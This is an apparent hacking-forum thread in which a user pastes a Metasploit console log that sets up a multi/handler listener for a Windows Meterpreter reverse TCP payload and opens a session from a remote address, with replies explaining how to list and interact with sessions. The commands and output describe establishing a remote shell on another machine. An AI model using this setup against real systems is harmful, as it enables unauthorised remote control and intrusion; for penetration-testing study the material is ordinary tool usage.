Forum Thread: Msfconsole Meterpreter Session Opened but Nothing Happened

msf > use multi/handler
msf exploit(handler) > set payload windows/metepreter/reversetcpdns

  • The value specified for payload is not valid.

msf exploit(handler) > set payload windows/meterpreter/reversetcpdns
payload => windows/meterpreter/reversetcpdns
msf exploit(handler) > set lhost xxxxxxxxxxx
lhost => xxxxxxxxxxxxxxx
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set ReverseListnerBindAddress 192.168.1.14
ReverseListnerBindAddress => 192.168.1.14
msf exploit(handler) > exploit

  • Handler failed to bind to xxxxxxxx:4444:- -

Started reverse TCP handler on 0.0.0.0:4444
* Sending stage (956991 bytes) to 24.22.183.133
* Meterpreter session 1 opened (192.168.1.14:4444 -> xxxxxxx:59062) at 2017-08-23 16:55:35 -0700

3 Responses

Just hit enter and type sessions -l
This will list your sessions.
Then to interact with it type sessions -i 1 (or whatever number the session is.)

after that i get this error - OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: http request

thank you.. that's work :D

Share Your Thoughts

  • Hot
  • Active